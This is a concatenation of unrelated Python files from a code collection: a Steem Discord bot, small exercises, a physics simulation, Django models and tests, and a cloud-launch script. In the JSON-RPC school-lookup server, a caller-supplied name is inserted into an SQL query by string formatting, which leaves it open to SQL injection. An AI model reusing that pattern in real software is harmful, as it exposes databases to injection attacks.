client.send_message(msg.channel, \"There's \" + str(len(list_of_users)) + \" users online.\")\n\n\telif command.startswith('hey'):\n\t\tawait client.send_message(msg.channel, \"Hey, utopian!\")\n\t\n\telse:\n\t\tcommand_error = await client.send_message(msg.channel, \"Incorrect command.\")\n\t\tawait asyncio.sleep(6)\n\t\tawait client.delete_message(command_error)\n\n# Deletes posts in channel_list channels older than given hours.\nasync def del_old_mess(hours): \n\tcurrtime = datetime.datetime.now() - datetime.timedelta(hours=hours)\n\tchn = []\n\tfor x in client.get_all_channels():\n\t\tif x.id in channels_list:\n\t\t\tchn.append(x)\n\tfor x in chn:\n\t\tasync for y in client.logs_from(x,limit=100,before=currtime):\n\t\t\tawait client.delete_message(y)\n\nasync def payout(total,sbd,ste):\n\ttotal = float(total) * 0.8 # Currator cut, anywhere between 0.85 and 0.75.\n\ttotalsbd = str(total * 0.5 * float(sbd))[:6]\n\ttotalsp = total * 0.5 * float(ste)\n\ttotalsp = str(totalsp * 1/float(ste))[:6] # SBD is always worth 1$ in the steem blockchain, so price of SBD to price of STE is always 1/STE.\n\tpayout = str(float(totalsbd) + float(totalsp))[:6]\n\treturn payout\n\nasync def get_info(msg):\n\tlink = str(msg.content).split(' ')[0]\n\tp = Post(link.split('@')[1])\n\tif check_age(p,2,48):\n\t\tembed=discord.Embed(color=0xe3b13c)\n\t\tembed.add_field(name=\"Title\", value=str(p.title), inline=False)\n\t\tembed.add_field(name=\"Author\", value=str(\"@\"+p.author), inline=True)\n\t\tembed.add_field(name=\"Nominator\", value=str('<@'+ msg.author.id +'>'), inline=True)\n\t\tembed.add_field(name=\"Age\", value=str(p.time_elapsed())[:-10] +\" hours\", inline=False)\n\t\tembed.add_field(name=\"Payout\", value=str(p.reward), inline=True)\n\t\tembed.add_field(name=\"Payout in USD\", value=await payout(p.reward,sbd_usd,ste_usd), inline=True)\n\t\tembed.set_footer(text=\"Marshal - a Steem bot by Vctr#5566 (@jestemkioskiem)\")\n\t\treturn embed\n\telse:\n\t\tage_error = await client.send_message(msg.channel, 'Your post has to be between 2h and 48h old.')\n\t\tawait client.delete_message(msg)\n\t\tawait asyncio.sleep(6)\n\t\tawait client.delete_message(age_error)\n\n# Used to authorize posts and sort them into correct channels.\nasync def authorize_post(msg, user): \n\tmsg_tag = msg.content.split('/')[3]\n\tp = Post(msg.content.split('@')[1])\n\n\tif check_age(p,2,48):\n\t\tawait client.delete_message(msg)\n\n\t\tif msg_tag in tag_list: # Sorting the item into a correct channel\n\t\t\tdest_channel = tag_list.index(msg_tag)\n\t\telse:\n\t\t\tdest_channel = len(tag_list)\n\n\t\tprint(msg)\n\t\tembed = await get_info(msg)\n\t\tawait client.send_message(client.get_channel(channels_list[dest_channel]), content=msg.content)\n\t\tawait client.send_message(client.get_channel(channels_list[dest_channel]), embed=embed) # Target channel & message for accepted posts.\n\t\tawait client.send_message(client.get_channel(channels_list[dest_channel]), content=\"This post was accepted by <@\" + user.id + \">\" )\n\t\t\t\n\n# Returns true if the post's age is between two dates.\ndef check_age(post,low,high): \n\tif post.time_elapsed() > datetime.timedelta(hours=low) and post.time_elapsed() < datetime.timedelta(hours=high):\n\t\treturn True\n\telse:\n\t\treturn False\n\n# Returns true if message's author has a moderating_roles role.\ndef is_mod(user): \n\tauth_roles = []\n\tfor x in user.roles:\n\t\tauth_roles.append(x.name.lower())\n\n\tfor x in moderating_roles:\n\t\tif x in auth_roles:\n\t\t\treturn True\n\t\t\tbreak\n\t\telse:\n\t\t\treturn False\n\n######################\n# DEFINE EVENTS HERE #\n######################\n\n@client.event\nasync def on_ready():\n\tprint('\\nInvite link: https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=8'.format(client.user.id))\n\tprint('--------')\n\tprint('Server-Management-Bot was built by Vctr#5566')\n\tprint('Steemit profile: https://steemit.com/@jestemkioskiem')\n\n\n# This is our event check. For simplicity's sake, everything happens here. You may add your own events, but commands are discouraged, for that, edit the command() function instead.\n@client.event\nasync def on_message(message):\n\tste_usd = cmc.ticker(\"steem\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\n\tsbd_usd = cmc.ticker(\"steem-dollars\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\n\tbtc_usd = cmc.ticker(\"bitcoin\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\n\tawait del_old_mess(132)\n\n\tif message.content.startswith(client.command_prefix): # Setting up commands. You can add new commands in the commands() function at the top of the code.\n\t\tawait command(message, message.content)\n\n\telif bot_role not in [y.name.lower() for y in message.author.roles] and message.channel.id in allowed_channels: # Checking if the poster wasn't the bot and if it was in one of the monitored channels.\n\t\tif message.content.startswith('https://steemit.com') or message.content.startswith('https://busy.org'):\n\t\t\tembed = await get_info(message)\n\t\t\tbotmsg = await client.send_message(message.channel, embed=embed)\n\t\t\treact_dict[message.id] = botmsg.id\n\n\t\telse:\n\t\t\tif not is_mod(message.author):\n\t\t\t\tawait client.delete_message(message)\n\t\t\t\tlink_error = await client.send_message(message.channel, content= '@' + str(message.author) + ' Your link has to start with \"https://steemit.com\" or \"https://busy.org\"')\n\t\t\t\tawait asyncio.sleep(6)\n\t\t\t\tawait client.delete_message(link_error)\t\n\n@client.event\nasync def on_reaction_add(reaction, user):\n\tif is_mod(user):\n\t\tif reaction.emoji == '☑':\n\t\t\tawait authorize_post(reaction.message, user)\n\t\t\tbotmsg = await client.get_message(reaction.message.channel, react_dict[reaction.message.id])\n\t\t\tawait client.delete_message(botmsg)\n\nif __name__ == '__main__': # Starting the bot.\n\tclient.run(os.getenv('TOKEN'))\n","sub_path":"marshal.py","file_name":"marshal.py","file_ext":"py","file_size_in_byte":8001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251853924","text":"arr = [8, 7, 2, 5, 3, 1]\r\ntarget = 10\r\narr = sorted(arr)\r\nr = len(arr)-1\r\nl = 0\r\noutput = []\r\nwhile l < r :\r\n sum = arr[l] + arr[r]\r\n if sum == target :\r\n output.append(arr[l])\r\n output.append(arr[r])\r\n break\r\n elif sum > target :\r\n r -= 1 \r\n else :\r\n l += 1\r\n\r\nif not output :\r\n print(\"Pair not found\")\r\nelse :\r\n print(\"pair found \", tuple(output))","sub_path":"array_01_sum.py","file_name":"array_01_sum.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299404338","text":"from geopy.geocoders import Nominatim\nimport json\nimport sys\nimport os\nimport overpy\nimport numpy as np\nfrom geopy import distance\n\n#if road name is not available => search for closest street\n#search in a radius\ndef searchForStreet(radius):\n \n query_test = \"\"\"way(around:\"\"\" + str(radius)+ ',' + str(lat) + \",\" + str(long) + \"\"\");out;\"\"\"\n result_test = api.query(query_test)\n test_way = result_test.ways[0]\n test_nodes = test_way.get_nodes(resolve_missing=True)\n location = geolocator.reverse(str(test_nodes[0].lat) + ',' + str(test_nodes[0].lon)) #zoom=16\n return location\n\n\nlat = sys.argv[1]\nlong = sys.argv[2]\nlat = float(lat)\nlong = float(long)\n\nlatlong_str = str(lat) + ', ' + str(long)\ngeolocator = Nominatim(user_agent=\"SV4VILoc\")\nlocation = geolocator.reverse(latlong_str) #zoom=16\nprint(location.raw)\nloc_addr = location.raw \n\n\nif 'road' not in loc_addr['address']:\n\n output_string = 'Leider konnte keine Straße gefunden werden'\n search_string = 'Suche in 50m Radius nach Straße'\n\n print(output_string)\n print(search_string)\n \n radius = 50.0\n loc = searchForStreet(radius)\n #if loc empty!\n print(location.raw[\"display_name\"])\n print('On google maps: ')\n maps_string = 'http://www.google.com/maps/place/' + str(lat) + ',' + str(long)\n print(maps_string)\n exit()\n \n \n \nif 'house_number' not in loc_addr['address']:\n output_string = 'Du befindest dich in der ' + loc_addr[\"address\"][\"road\"] + ' Straße'\nelse:\n output_string = 'Du befindest dich in der ' + loc_addr[\"address\"][\"road\"] + ' Straße Nummer ' + loc_addr[\"address\"][\"house_number\"]\n\nprint(output_string)\n\nroad_name = loc_addr[\"address\"][\"road\"]\n\nlat_s = round(lat,1) - 0.1\nlong_s = round(long,1) - 0.1\n\nlat_l = round(lat,1) + 0.1\nlong_l = round(long,1) + 0.1\n\nbbox_string = '(' + str(lat_s) + ',' + str(long_s) + ',' + str(lat_l) + ',' + str(long_l) + ')'\n\n\nquery_string = \"\"\"way[\"name\"=\"\"\" + road_name + \"]\"+bbox_string+\";out;\"\"\"\nprint(query_string)\n\napi = overpy.Overpass()\nresult = api.query(query_string)\n\nway = result.ways[0]\nnodes = way.get_nodes(resolve_missing=True)\n\n\n#possible accuracy => if 10 nodes in street (evenly spaced?????) then node 2 is 20%!\nstreet_perc = 1.0/len(nodes)\n\n\ncur_pos = (lat, long)\n\ndist = 100000000\ns_pos = -1\n\nfor pos in range(0,len(nodes)):\n \n node_pos = (nodes[pos].lat, nodes[pos].lon)\n c_dist = distance.distance(cur_pos, node_pos).km\n if(dist > c_dist):\n dist = c_dist\n s_pos = pos\n \nperc = int((street_perc * s_pos) * 100)\n\nprint('Du hast die Strasse zu %i prozent passiert' %perc)\n\nprint('On google maps: ')\nmaps_string = 'http://www.google.com/maps/place/' + str(lat) + ',' + str(long)\nprint(maps_string)\n","sub_path":"ICG/gps2name.py","file_name":"gps2name.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309305923","text":"\"\"\"\n VPython教學: 8-2.簡諧運動, 有阻尼\n 日期: 2018/2/25\n 作者: 王一哲\n\"\"\"\nfrom vpython import *\n\n\"\"\"\n 1. 參數設定, 設定變數及初始值\n\"\"\"\nm = 4 # 木塊質量 4 kg\nsize = 1 # 木塊邊長 1 m\nR = 5 # 振幅 5 m\nk = 1 # 彈性常數 1 N/m\nL0 = R + size # 彈簧原長\nb = 1 # 阻尼 f = -bv, overdamped: b^2 > 4mk, critical damping: b^2 = 4mk, underdamped: b^2 < 4mk\nT = 2*pi*sqrt(m/k) # 週期理論值\ni = 0 # 木塊運動經過的週期次數\nt = 0 # 時間\ndt = 0.001 # 時間間隔\n\n\"\"\"\n 2. 畫面設定\n (1) 用 canvas 物件作為顯示動畫用的視窗 http://www.glowscript.org/docs/VPythonDocs/canvas.html\n (2) 用 box 物件產生地板、牆壁、木塊 http://www.glowscript.org/docs/VPythonDocs/box.html\n (3) 用 helix 物件產生彈簧 http://www.glowscript.org/docs/VPythonDocs/helix.html\n (4) 用 arrow 物件產生表示速度、加速度用的箭頭 http://www.glowscript.org/docs/VPythonDocs/arrow.html\n (5) 用 graph 產生繪圖視窗 http://www.glowscript.org/docs/VPythonDocs/graph.html\n\"\"\"\n# 產生動畫視窗、地板、木塊、彈簧\nscene = canvas(title = \"Simple Harmonic Motion\", width = 800, height = 400, x = 0, y = 0, background = vector(0, 0.6, 0.6))\nfloor = box(pos = vector(0, -(size+0.1)/2, 0), length = R+L0+2, height = 0.1, width = R, texture = textures.metal)\nwall = box(pos = vector(-L0, 0, 0), length = 0.1, height = size, width = R, texture = textures.metal)\nblock = box(pos = vector(R+size/2, 0, 0), length = size, height = size, width = size, texture = textures.wood)\nblock.v = vector(0, 0, 0)\nspring = helix(pos = vector(-L0, 0, 0), radius = 0.3*size, thickness = 0.05*size, color = color.yellow)\nspring.axis = block.pos - spring.pos - vector(size/2, 0, 0)\n# 產生表示速度、加速度的箭頭\narrow_v = arrow(pos = block.pos + vector(0, size, 0), axis = vector(0, 0, 0), shaftwidth = 0.3*size, color = color.green)\narrow_a = arrow(pos = block.pos + vector(0, 2*size, 0), axis = vector(0, 0, 0), shaftwidth = 0.3*size, color = color.magenta)\n# 繪圖部分\ngd = graph(title = \"plot\", width = 600, height = 450, x = 0, y = 400, xtitle = \"t(s)\", \\\n ytitle = \"blue: x(m), green: v(m/s), magenta: a(m/s^2)\")\nxt = gcurve(graph = gd, color = color.blue)\nvt = gcurve(graph = gd, color = color.green)\nat = gcurve(graph = gd, color = color.magenta)\n\n\"\"\"\n 3. 物體運動部分, 重覆5個週期\n\"\"\"\nvp = block.v.x\nwhile(i < 5 and t < 5*T):\n rate(1000)\n# 計算彈簧長度、伸長量、回復力\n spring.axis = block.pos - spring.pos - vector(size/2, 0, 0)\n F = -k * (spring.axis - vector(L0, 0, 0)) - b * block.v\n# 計算木塊加速度, 更新速度、位置\n block.a = F/m\n block.v += block.a*dt\n block.pos += block.v*dt\n# 更新代表速度、加速度的箭頭位置、方向、長度\n arrow_v.pos = block.pos + vector(0, size, 0)\n arrow_a.pos = block.pos + vector(0, 2*size, 0)\n arrow_v.axis = block.v\n arrow_a.axis = block.a\n# 畫出 x-t, v-t, a-t 圖\n xt.plot(pos = (t, block.pos.x - size/2))\n vt.plot(pos = (t, block.v.x))\n at.plot(pos = (t, block.a.x))\n# 判斷木塊是否經過一個週期\n vc = block.v.x\n if(vp > 0 and vc < 0):\n i += 1\n print(i, t)\n vp = vc\n# 更新時間\n t += dt\n","sub_path":"08.簡諧運動/8-2_SHM_damp.py","file_name":"8-2_SHM_damp.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113238626","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image\nfrom django.conf import settings\nimport os\nimport shutil\n# Create your models here.\n\nDEFAULT_FORMAT = \".jpg\"\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n head = models.CharField(max_length = 100)\n head160 = models.ImageField(upload_to=\"head_img\",null=True,blank=True)\n create_time = models.DateField(auto_now = True,auto_now_add = False)\n note = models.URLField()\n address = models.TextField()\n resume = models.TextField()\n\n def save(self,*args,**kargs): \n super(UserProfile, self).save(*args,**kargs)\n if not self.head160:\n return\n pw = self.head160.width\n ph = self.head160.height\n\n #extention = os.path.splitext(self.head)[1]\n path = settings.MEDIA_ROOT + \"head_img/\" + str(self.user.id) + \"_160\" + DEFAULT_FORMAT\n thumbnail_path = settings.MEDIA_ROOT + \"head_img/\" + str(self.user.id) + \"_48\" + DEFAULT_FORMAT\n if pw > 48 or ph > 48:\n pw = 48\n ph = 48\n else :\n shutil.copy2(path, thumbnail_path) \n return\n\n image = Image.open(path)\n thumbnail = image.thumbnail((pw,ph),Image.ANTIALIAS)\n image.save(thumbnail_path,\"jpeg\")\n\n\n def save_without_img(self,*args,**kargs):\n super(UserProfile, self).save(*args,**kargs)\n\n\nclass PublicNotif(models.Model):\n content = models.TextField()\n def __unicode__(self):\n return self.content\n\nclass UserMessage(models.Model):\n user = models.ForeignKey(User)\n message_kind = models.IntegerField()\n detail_id = models.IntegerField()\n isviewed = models.BooleanField()\n\nclass UserCollect(models.Model):\n user = models.ForeignKey(User)\n message_kind = models.IntegerField()\n detail_id = models.IntegerField()\n","sub_path":"chuxin/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182256621","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\n\nimport logging\n\nimport sqlalchemy\n\nfrom main.settings import set_config\nset_config('test')\n\nfrom .base import _Base\nfrom main.models.ml import (\n MLModel, ModelLog, RequestLog, PredictionScore,\n QuestionType\n)\nfrom main.models.data import Image, Question\n\nlogging.disable(logging.CRITICAL)\n\nSAMPLE_TEXT = 'sample text'\n\n\nclass MLModelTest(_Base):\n\n def test_model_type_save_and_query(self):\n model_name = 'test_model'\n with self.assertRaises(ModuleNotFoundError):\n model = MLModel(name=model_name,\n type='cls',\n category='test',\n module='invalid_module',\n object='Class')\n model.save()\n\n model = MLModel(name=model_name,\n type='cls',\n category='question_type',\n module='main.ml',\n object='Class')\n model.save()\n\n data = MLModel.query().first()\n\n self.assertEqual(data.id, model.id)\n self.assertEqual(data.name, model_name)\n\n def test_model_type_choice_field_work(self):\n model_name = 'test_model'\n model = MLModel(name=model_name,\n type='cls',\n category='question_type',\n module='main.ml',\n object='Class')\n model.save()\n\n data = MLModel.get(model.id)\n self.assertEqual(data.type, 'classification')\n\n def test_check_unique_name_with_handling_error(self):\n model_name = 'test_model'\n cat = 'question_type'\n model = MLModel(name=model_name,\n type='cls',\n category=cat,\n module='main.ml',\n object='Class')\n model.save()\n\n model2 = MLModel(name=model_name,\n type='seq',\n category='what',\n module='main.ml',\n object='Class')\n\n with self.assertRaises(Exception):\n with self.assertLogs(level=logging.ERROR):\n model2.save()\n\n data = MLModel.query().filter_by(name=model_name).first()\n self.assertEqual(data.category, cat)\n\n with self.assertRaises(ValueError):\n MLModel(name='invalid_type',\n type='incalid',\n category=cat,\n module='main.ml',\n object='Class')\n\n\n def test_update_score_data(self):\n new_score = 0.68\n model = MLModel(name='test_model',\n type='cls',\n category='question_type',\n module='main.ml',\n object='Class',\n metrics='validation_accuracy',\n score=0.65)\n\n model.update_score(score=new_score)\n\n data = MLModel.query().first()\n self.assertEqual(data.score, new_score)\n\n\nclass ModelLogTest(_Base):\n\n def test_model_log_saved(self):\n log = ModelLog(log_type='success', log_text=SAMPLE_TEXT)\n\n log.save()\n\n data = ModelLog.query() \\\n .filter_by(log_text=SAMPLE_TEXT) \\\n .first()\n\n self.assertEqual(data.log_text, SAMPLE_TEXT)\n\n\nclass RequestLogTest(_Base):\n\n def setUp(self):\n super(RequestLogTest, self).setUp()\n\n self.qtype = QuestionType(type='testcase')\n self.qtype.save()\n\n q = Question(question='is this test')\n q.save()\n self.question_id = q.id\n\n img = Image(filename='test.jpg')\n img.save()\n self.img_id = img.id\n\n def test_serialize_data_as_dict(self):\n log = RequestLog(\n question_type_id=self.qtype.id,\n question_id=self.question_id,\n image_id=self.img_id,\n log_type='success',\n log_text=SAMPLE_TEXT)\n\n log.save()\n\n # check if properly saved\n log = RequestLog.query().first()\n self.assertEqual(log.log_text, SAMPLE_TEXT)\n\n data = log.to_dict()\n\n self.assertEqual(data['id'], log.id)\n self.assertEqual(data['question_type_id'], self.qtype.id)\n self.assertEqual(data['log_type'], 'success')\n self.assertEqual(data['log_text'], SAMPLE_TEXT)\n self.assertEqual(data['image_id'], self.img_id)\n\n # not stored and check if it can handle empty data\n self.assertIsNone(data['model_id'])\n\n\nclass PredictionScoreTest(_Base):\n\n def setUp(self):\n super(PredictionScoreTest, self).setUp()\n\n self.qtype = QuestionType(type='testcase')\n self.qtype.save()\n\n q = Question(question='is this test')\n q.save()\n self.question_id = q.id\n\n img = Image(filename='test.jpg')\n img.save()\n self.img_id = img.id\n\n self.test_predict = 'some result'\n log = RequestLog(\n question_type=self.qtype,\n question_id=self.question_id,\n image_id=self.img_id,\n log_type='success',\n log_text=SAMPLE_TEXT)\n log.save()\n\n pred = PredictionScore(prediction=self.test_predict,\n log=log,\n rate=1)\n pred.save()\n self.id = pred.id\n self.req_log = log\n\n def test_model_saved_properly(self):\n data = PredictionScore.get(self.id)\n\n # check saved properly\n self.assertEqual(data.prediction, self.test_predict)\n\n # check make relationship with log\n self.assertEqual(data.log.log_text, SAMPLE_TEXT)\n\n # fail if rate is too high or low\n with self.assertRaises(ValueError):\n PredictionScore(prediction='invalid',\n log=self.req_log,\n rate=10)\n\n with self.assertRaises(ValueError):\n PredictionScore(prediction='invalid',\n log=self.req_log,\n rate=0)\n\n def test_update_score_information(self):\n data = PredictionScore.get(self.id)\n\n with self.assertRaises(ValueError):\n data.update()\n\n target = 'validated'\n data.update(question_type='updated', answer=target)\n\n new_data = PredictionScore.get(self.id)\n self.assertEqual(new_data.answer, target)\n\n\nclass QuestionTypeModelTest(_Base):\n\n def test_question_model_save_and_query(self):\n test = 'test type'\n qt = QuestionType(type=test)\n qt.save()\n\n data = QuestionType.query().filter_by(type=test).first()\n self.assertEqual(data.type, test)\n self.assertEqual(data.type, qt.type)\n init_size = QuestionType.query().count()\n\n # not saved model which violated unique constraints\n error_model = QuestionType(type=test)\n with self.assertRaises(Exception):\n with self.assertLogs(level=logging.ERROR):\n error_model.save()\n\n self.assertEqual(\n QuestionType.query().count(),\n init_size\n )\n\n def test_register_question_type(self):\n test = 'test type'\n QuestionType.register(test)\n\n data = QuestionType.query().first()\n self.assertEqual(data.type, test)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/models/test_ml.py","file_name":"test_ml.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"124252804","text":"import random\n\nclass Game:\n check = None\n score = 0\n heads_n_tails_answer = [\"heads\", \"tails\", ]\n higher_or_lower_score = []\n higher_or_lower_answer = None\n\n def __init__(self):\n self.check = True\n print(\"~~ Heads'n'Tails / Higher or Lower ~~\")\n print(\" /////////////////////////////////// \")\n\n @staticmethod\n def menu():\n print(\"Choose what you want to play:\\n\"\n \"1. Heads and Tails\\n\"\n \"2. Higher or Lower\\n\"\n \"3. Exit\")\n\n def menu_choice(self):\n self.check = True\n while self.check:\n switch = input(self.menu())\n if switch == '1':\n return self.heads_n_tails()\n elif switch == '2':\n return self.higher_or_lower()\n elif switch == '3':\n exit()\n else:\n self.check = False\n\n def heads_n_tails(self):\n self.check = True\n while self.check:\n answer = input(\"What am I thinking about Heads or Tails?\\n$\")\n if \"\".join(answer).lower() == self.heads_n_tails_answer[random.randint(0, 1)]:\n self.score += 1\n print(\"Good answer\")\n else:\n print(\"Wrong answer :(\")\n answer = input(\"Try again? [T/N]\")\n if \"\".join(answer).upper() == \"N\":\n return self.menu_choice()\n\n def higher_or_lower(self):\n number = 50\n self.check = True\n while self.check:\n print(\"What number from 0 to {} I've picked?\".format(number))\n my_pick = random.randint(0, number)\n for i in range(0, 11):\n answer = input(\"You have {} guesses.\\n\".format(10-i))\n if int(answer) > my_pick:\n print(\"Lower!\")\n elif int(answer) < my_pick:\n print(\"Higher!\")\n else:\n print(\"Yea it's {}\".format(answer))\n break\n\n answer = input(\"Try again? [T/N]\")\n if \"\".join(answer).upper() == \"N\":\n return self.menu_choice()\n number += 50\n\n\ngame = Game()\n\ngame.menu_choice()\n","sub_path":"mini_game.py","file_name":"mini_game.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"145905471","text":"#############################################\n# CIE IGCSE CS Paper 2\n# June 2015 0478/21\n#\n# Sample Answer by Mr Farren\n#\n#Task 1:\n# A data logger records the temperature on the roof of a school twice a day, at midday and midnight.\n# Input and store the temperatures recorded for a month. You must store the temperatures in two onedimensional\n# arrays, one for the midday temperatures and one for the midnight temperatures. All the\n# temperatures must be validated on entry and any invalid temperatures rejected. You must decide your\n# own validation rules. You may assume that there are 30 days in a month.\n\n#Define variables and constants\nDAYS = 5\nmiddayTemp = []\nmidnightTemp = []\ntemperature = 0\nday = 0\n\nfor day in range (0,DAYS):\n invalid = True\n while invalid:\n temperature = float(input(\"Enter midday temperature: \")) \n if temperature < -10.0:\n print(\"Out of range - too low\")\n elif temperature > 60.0:\n print(\"Out of range - too high\")\n else:\n middayTemp.append(temperature)\n invalid = False\n invalid = True\n while invalid:\n temperature = float(input(\"Enter midnight temperature: \"))\n if temperature < -10.0:\n print(\"Out of range - too low\")\n elif temperature > 60.0:\n print(\"Out of range - too high\")\n else:\n midnightTemp.append(temperature)\n invalid = False\nprint(\"Miday Temps:\",middayTemp) # For debugging to check that values are entered\nprint(\"Midnight Temps:\",midnightTemp)\n\n#TASK 2:\n#\n#-------------------------\n\n#set initial variables\nmiddayTotal = 0.0\nmidnightTotal = 0.0\n\n# Get sum of all temps\nfor i in range(0,DAYS):\n middayTotal = middayTotal + middayTemp[i] \n midnightTotal = midnightTotal + midnightTemp[i]\n\n# Calculate the average\nmiddayAverage = middayTotal / DAYS #Divide by number of days\nmidnightAverage = midnightTotal / DAYS\n\n#Output results to display with suitable prompts and formatting\nprint(\"Average midday temperature: %.1f\" % middayAverage) #Produces a string output formatted with 2 decimal places\nprint(\"Average midnight temperature: %.1f\" % midnightAverage) \nprint(middayAverage)\nprint(midnightAverage)","sub_path":"paper2_tasks/2015-2.1/MrF/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"639135470","text":"import sys\r\nimport qdarkstyle\r\nfrom PyQt5.QtWidgets import QDialog, QApplication\r\nfrom MyFirstUI import Ui_Form #MyFirstUI 是���的.py檔案名字\r\n\r\nclass AppWindow(QDialog):\r\n def __init__(self):\r\n super().__init__()\r\n self.ui = Ui_Form()\r\n self.ui.setupUi(self)\r\n self.show()\r\n\r\napp = QApplication(sys.argv)\r\napp.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\r\nw = AppWindow()\r\nw.show()\r\nsys.exit(app.exec_())","sub_path":"主程式-股價/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"377122724","text":"from django.conf.urls import url\n\nfrom .views import (\n\tPositionListView,\n\tPositionDetailView,\n\tPositionCreateView,\n\tPositionUpdateView\n\t)\n\nurlpatterns = [\n\turl(r'^$', PositionListView.as_view(), name='list'),\n\turl(r'^create/$', PositionCreateView.as_view(), name='create'),\n\turl(r'^(?P[\\w-]+)/$', PositionUpdateView.as_view(), name='edit')\n]","sub_path":"src/positions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576382876","text":"\"\"\"\n\n 13_json_rpc_server.py -\n\n This server uses JSON-RPC receive requests. A sample\n client can be found in 14_json_rpc_client.py.\n\n To run this, you should install two small dependencies:\n\n pip install Werkzeug\n\n pip install json-rpc.\n\n Run this first, then run 14_json_rpc_client.py\n\n\"\"\"\nimport sqlite3\nfrom collections import namedtuple\n\nfrom werkzeug.wrappers import Request, Response\nfrom werkzeug.serving import run_simple\n\nfrom jsonrpc import JSONRPCResponseManager, dispatcher\n\nSchool = namedtuple('School', 'name city state')\ndata_sourcefile = '../ch02_database/schools.db'\nSELECT_SCHOOLS_SQL = 'SELECT fullname, city, state FROM schools WHERE fullname like \"%{0}%\"'\n\n\n@dispatcher.add_method\ndef get_location(school_name):\n school_data = []\n connection = None\n\n try:\n connection = sqlite3.connect(data_sourcefile)\n print('here!')\n except sqlite3.Error as err:\n print('Error connecting to database: {0}'.format(err))\n return school_data\n\n connection.row_factory = sqlite3.Row # allows accessing cursor record by column name instead of index value\n cursor = connection.cursor()\n\n try:\n cursor.execute(SELECT_SCHOOLS_SQL.format(school_name))\n for sch in cursor.fetchall():\n school_data.append(School(*sch))\n except sqlite3.Error as e:\n print('Error processing request: {0}'.format(e))\n return school_data\n finally:\n if connection:\n connection.close()\n return school_data\n\n\n@Request.application\ndef application(request):\n response = JSONRPCResponseManager.handle(request.data, dispatcher)\n return Response(response.json, mimetype='application/json')\n\n\nrun_simple('localhost', 8005, application)\n","sub_path":"student_files/ch04_network_prog/13_json_rpc_server.py","file_name":"13_json_rpc_server.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548409927","text":"weight = input('请输入体重(公斤): ')\nheight = input('请输入身高(公尺): ')\nweight = float(weight)\nheight = float(height)\nbmi = weight / (height * height)\nprint('您的BMI为:', bmi)\nif bmi < 18.5:\n print('您体重过轻')\nelif bmi >= 18.5 and bmi < 24:\n print('您的BMI正常')\nelif bmi >= 24 and bmi < 27:\n print('您体重过重')\nelif bmi >= 27 and bmi < 30:\n print('您是轻度肥胖')\nelif bmi >= 30 and bmi < 35:\n print('您是中度肥胖')\nelse:\n print('您是重度肥胖')","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345696898","text":"import os\n\nimport doodad as dd\nimport doodad.ec2 as ec2\nimport doodad.ssh as ssh\nimport doodad.mount as mount\nimport colored_traceback.always\nfrom doodad.utils import EXAMPLES_DIR, REPO_DIR\n\n# Local docker\nmode_docker = dd.mode.LocalDocker(\n image='thanard/pytorch:latest',\n)\n\n# or this! Run experiment via docker on another machine through SSH\nmode_ssh = None\n# mode_ssh = dd.mode.SSHDocker(\n# image='python:3.5',\n# credentials=ssh.SSHCredentials(hostname='my.machine.name', username='my_username', identity_file='~/.ssh/id_rsa'),\n# )\n\n# or use this!\n# mode_ec2 = None\nmode_ec2 = dd.mode.EC2AutoconfigDocker(\n image='thanard/pytorch:latest',\n region='us-east-1',\n zone='us-east-1b',\n instance_type='p2.xlarge',\n spot_price=1.0,\n s3_log_prefix='secret',\n gpu=True,\n terminate=False\n)\n\nMY_RUN_MODE = mode_ec2 # CHANGE THIS\n\n# Set up code and output directories\nOUTPUT_DIR = '/example/outputs' # this is the directory visible to the target\nmounts = [\n mount.MountLocal(local_dir=REPO_DIR, mount_point='/root/code/doodad', pythonpath=True), # Code\n # mount.MountLocal(local_dir='/home/thanard/Downloads/rllab/sandbox/thanard/infoGAN', pythonpath=True),\n mount.MountLocal(local_dir=os.path.join(EXAMPLES_DIR, 'secretlib'), pythonpath=True), # Code\n]\n\nif MY_RUN_MODE == mode_ec2:\n output_mount = mount.MountS3(s3_path='outputs', mount_point=OUTPUT_DIR, output=True) # use this for ec2\nelse:\n output_mount = mount.MountLocal(local_dir=os.path.join(EXAMPLES_DIR, 'tmp_output'),\n mount_point=OUTPUT_DIR, 